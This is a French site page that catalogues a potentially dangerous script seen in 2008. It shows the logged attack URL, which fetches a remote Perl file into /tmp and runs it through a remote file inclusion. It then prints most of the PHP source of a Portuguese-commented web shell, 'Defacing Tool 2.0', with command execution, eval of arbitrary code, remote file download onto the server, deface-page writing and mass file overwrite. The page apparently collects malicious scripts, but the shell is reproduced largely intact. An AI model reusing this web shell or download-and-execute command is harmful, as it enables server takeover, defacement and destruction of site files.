Script potentiellement dangereux sur sprula-kit-net

IP de provenance : 201.21.186.174

Date de connexion : 29-03-2008 19:37:44
Site : http://sprula.kit.net/cmdpriv8/tool25.dat?&cmd=cd%20/tmp;GET%20http://www.sprula.kit.n
et/bruxom4l.txt%20>%20bruxom4l.txt;perl%20bruxom4l.txt%20abcase

http://sprula.kit.net/ Retour liste scripts

<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo,

por favor, mantenha o nome de seus autores originais
e por favor, entre em contato

comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um

sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um

babaca, ajude a melhora-lo tambem!!
-->
<?php

//The

Rules
include("http://sprula.kit.net/cmdpriv8/therules25.dat");

if(empty($chdir))

$chdir = @$_GET['chdir'];
if(empty($chdir)) $chdir =

@$_REQUEST['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($cmd)) $cmd =

@$_REQUEST['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($fu)) $fu =

@$_REQUEST['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($list)) $list =

@$_REQUEST['list'];
if(empty($eval)) $eval = @$_GET['eval'];
if(empty($eval)) $eval

= @$_REQUEST['eval'];
if(empty($evalcode)) $evalcode =

@$_POST['evalcode'];
if(empty($evalcode)) $evalcode =

@$_GET['evalcode'];
if(empty($evalcode)) $evalcode =

@$_REQUEST['evalcode'];
if(empty($evalfile)) $evalfile =

@$_GET['evalfile'];
if(empty($evalfile)) $evalfile = @$_REQUEST['evalfile'];

$cmd

= stripslashes(trim($cmd));


//CHDIR tool
if (strpos($cmd, 'chdir')!==false and

strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 =

explode(";",$boom['1'], 2);
$toDir =

$boom2['0'];

if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir

..')!==false){
$cadaDir =

array_reverse(explode("/",$chdir));

if($cadaDir['0']=="" or $cadaDir['0']

==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/";

$chdir = $chdir."/";}
$toDir =

str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else

if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir

~')===0) $toDir = getcwd();

if(strrpos($toDir,"/")==(strlen($toDir)-1))

$toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or

@is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or

@is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1:

chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd =

trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir,

'//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir))

$ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir

'$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it,

try to use 'cd' in the cmd line instead.\n";
$cmdShow = htmlspecialchars($cmd,

ENT_QUOTES);

//To keep the changes in the url, when using the 'GET' way to send php

variables
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else

$showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or

empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0"

or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'";

$fl="off";}
//if($dtheme=="" or empty($dtheme))$dtheme="";else

$showtheme="+'dtheme=$dtheme&'";

//INFO table (pro and normal)
/*if

(@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at

/usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc"))

$pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget"))

$pro3="<i>wget</i> at /usr/bin/wget, ";
if

(@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx,

";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc,

";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc

";*/
$safe = @ini_get('safe_mode');
if ($safe)

$pro.="<b><i>safe_mode</i>: $safe</b>, "; else

$pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP

</i>".phpversion();
$pro .= ", <span

class='infod'><i><b>click for more

info</b></i></span>";
$login=@posix_getuid(); $euid=@posix_geteuid();

$gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname =

@posix_uname();

//Turns the 'ls' command more usefull, showing it as it looks in the

shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --',

$cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F',

$cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F',

$cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F',

$cmd);
else if($cmd=='ls') $cmd = "ls -F";

//If there are some '//' in the cmd,

its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/',

$chdir);
?>
<body onload="focar();">

<?
//Style page - must be into

the body tag
include($style_addr);
?>

<script>
function inclVar(){var addr

= location.href.substring(0,location.href.indexOf('?')+1);var stri =

location.href.substring(addr.length,location.href.length+1);inclvar =

stri.substring(0,stri.indexOf('='));}
function

enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclv

ar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;?>

t;+'cmd='+window.document.formulario.cmd.value;return false;}
function

ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+in

clvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl.$showtheme;?>+'

fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function

PHPget(){inclVar(); /*if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc

soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso?

\nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo

recurso."))goPreGet(); else{*/var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do

arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou

ftp://:","http://www.amigosdosaber.org.br/debora/");var dir =

c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var

p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho

completo\n-O diretorio de destino deve ser

writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inc

lvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$sh

owdir.$showtheme;?>+'c='+c+'&p='+p);}/*}*/
function

goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$

phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir.$showtheme;?>

t;+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by

r3v3ng4ns\nDigite a URL do frame","http://www.amigosdosaber.org.br/debora/");var dir =

url.substring(0,url.lastIndexOf('/')+1);var file =

url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite

o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve

ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by

r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by

r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_a

ddr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir.$showtheme;?>+'url

='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[

PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho

completo\n-Abrir arquivos remotos, use http:// ou

ftp://","<?=$chdir;?>/index.php"); var dir =

o.substring(0,o.lastIndexOf('/')+1);var file =

o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<

;?=$feditor_addr;?>?&'<?=$showtheme;?>+'inclvar='+inclvar+'&o='+o);}


function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a

SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'=

'+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false

}}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1;

window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd

_addr;?>'+'?&'<?=$showdir.$showfu.$showtheme;?>+'list='+turn+'&cmd=

'+window.document.formulario.cmd.value;return false;}
function

overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do

diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos

serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for

para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive

o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize

http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite

a origem do arquivo que

substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm

("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague

os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos

arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja

substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a

palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar

um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de

origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?

>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu.$showtheme?>+'&k

eyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
function

evalAct(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+in

clvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;

?>+'eval=1#evalFocus';return false;}
function evalC(){inclVar();

oque=window.document.evalform.evalcode.value;

window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd

_addr;?>'+'?&'<?=$showdir.$showfu.$showfl.$showtheme;?>+'eval=1&evalc

ode='+oque+'#evalFocus';return false;}
//function

[...]


Retour liste scripts

Crédits vignettes : Thumbzor

© latarteauchips 2024
Volet automatique | Les amis des loisirs : Sorties spectacles paris| Chalet Vosges | Bioénergétique | Visites Paris |
artisan web
achat cash de votre mobile et recyclage telephone
Revendez vos mobiles chez Mister Reprise
Astuces & trucs
Css
Divertissement
Html
Javascript
Linux
Outils
Php
Scripts
Sécurité failles
setia industrie logo
Setia Industries
Valid XHTML 1.0 Strict